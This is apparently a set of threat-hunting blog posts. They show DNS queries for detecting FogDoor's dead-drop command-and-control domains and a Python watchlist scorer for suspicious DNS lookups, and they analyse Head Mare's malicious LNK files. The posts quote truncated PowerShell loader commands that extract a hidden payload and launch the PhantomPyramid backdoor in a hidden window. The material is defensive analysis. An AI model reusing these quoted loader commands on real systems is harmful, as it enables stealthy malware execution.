powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = '%TEMP%'};$exs=@('.lnk');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x031732EF} | Select-Object -ExpandProperty FullName ;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010E4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x002A7965;$lnkFile.Read($pdfFile, 0, 0x002A7965);$pdfPath = $lnkPath.replace('.lnk','.pdf...

092. Detecting FogDoor's C&C Communications

Hello everyone! Let's talk about the Dead Drop Resolver (DDR) technique one more time. The Cyble team presented a report on FogDoor. The malware retrieves attack commands from a social media profile, communicating with bark[.]lgbt/api. It means we can hunt for communications with this domain, of course:

event_type: "dnsreq" AND dns_rname: "bark.lgbt"

That's not all! The adversary also used a temporary webhook storage, webhookbin[.]net, to collect executed command output. We can hunt for similar activity using the same logic:

event_type: "dnsreq" AND dns_rname: "webhookbin.net"

As always, you can find more detection opportunities in the report. See you tomorrow!
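This post, the Piping Server post (108), the Canarytokens post (100) and the IP-lookup post (117) all hunt on DNS requests for a watchlist of legitimate services. Two things bite in practice: a substring match on "ipify.org" also fires on a look-alike such as ipify.org.evil.example, and a single IP-lookup resolution on its own is the false-positive case the IP-lookup post warns about. The following is an added example (not code from any of the posts) that matches query names against the watchlist on label boundaries, aggregates hits per host, and ranks hosts that touch more than one category (an IP lookup followed by a relay service, say) above hosts with a lone lookup. The category labels and the DNS events are constructed for the example; the domains are the ones named in the four posts.

```python
# Domains named in posts 117, 108, 100 and 092; the category labels are my own.
WATCHLIST = {
    "wtfismyip.com": "ip-lookup",
    "ipify.org": "ip-lookup",
    "icanhazip.com": "ip-lookup",
    "ip-api.com": "ip-lookup",
    "checkip.dyndns.org": "ip-lookup",
    "reallyfreegeoip.org": "ip-lookup",
    "ppng.io": "c2-relay",
    "canarytokens.com": "victim-beacon",
    "bark.lgbt": "dead-drop",
    "webhookbin.net": "output-collection",
}


def watchlist_hit(qname: str):
    """Label-boundary suffix match: api.ipify.org hits ipify.org, while
    ipify.org.evil.example and other.dyndns.org do not. Returns (domain, category) or None."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        cand = ".".join(labels[i:])
        if cand in WATCHLIST:
            return cand, WATCHLIST[cand]
    return None


def hunt(events) -> dict:
    """Per-host summary of dnsreq events: watchlist domains with counts, categories, first seen."""
    summary = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        hit = watchlist_hit(ev["dns_rname"])
        if hit is None:
            continue
        domain, category = hit
        h = summary.setdefault(ev["host"], {"domains": {}, "categories": set(), "first_seen": ev["ts"]})
        h["domains"][domain] = h["domains"].get(domain, 0) + 1
        h["categories"].add(category)
    return summary


def prioritize(summary: dict) -> list:
    """Hosts touching several categories first, then by total hits; lone IP lookups sink."""
    return sorted(summary, key=lambda h: (-len(summary[h]["categories"]),
                                          -sum(summary[h]["domains"].values()), h))


# Constructed dnsreq events (hosts, timestamps and the look-alike name are made up).
SAMPLE_EVENTS = [
    {"ts": "2025-04-02T09:00:01Z", "host": "WS-042", "dns_rname": "api.ipify.org"},
    {"ts": "2025-04-02T09:00:03Z", "host": "WS-042", "dns_rname": "ppng.io"},
    {"ts": "2025-04-02T09:05:00Z", "host": "WS-042", "dns_rname": "ppng.io."},
    {"ts": "2025-04-02T10:00:00Z", "host": "WS-007", "dns_rname": "www.example.com"},
    {"ts": "2025-04-02T10:00:05Z", "host": "WS-007", "dns_rname": "ipify.org.evil.example"},
    {"ts": "2025-04-02T10:00:06Z", "host": "WS-007", "dns_rname": "other.dyndns.org"},
    {"ts": "2025-04-02T11:00:00Z", "host": "WS-013", "dns_rname": "icanhazip.com"},
]

if __name__ == "__main__":
    s = hunt(SAMPLE_EVENTS)
    for host in prioritize(s):
        print(host, s[host])
```

WS-042 lands on top because an IP lookup immediately followed by a Piping Server resolution is the sequence the posts describe, while WS-013's single icanhazip.com lookup is the kind of hit you expect to baseline against admin tooling and browser extensions.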

091. Hunting for Malicious LNK Files as Seen in a Recent Head Mare Campaign

Hello everyone! Today we'll look at another curious example of PowerShell abuse - this time from Head Mare (we track this activity cluster as Rainbow Hyena). The adversary distributed password-protected archives with malicious LNK files. The LNK file executes the following PowerShell command to run the PhantomPyramid backdoor on the compromised system:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "$r=$(Get-Location).Path + '\\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip';if(Test-Path $r) { cmd.exe /c start /B $r; } else { $f=$(Get-ChildItem -Path 'C:\Users\<USER>' -Recurse -Filter '\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip' | Select-Object -First 1); if($f) { $r=$f.FullName; cmd.exe /c start /B $f.FullName; }; };if(-Not (Test-Path $r)) { $r=$(Get-ChildItem -Path 'C:\Users\<USER>\AppData\Local\Temp' -Recurse -Filter "\x417\x430\x44f\x432\x43a\x430_\...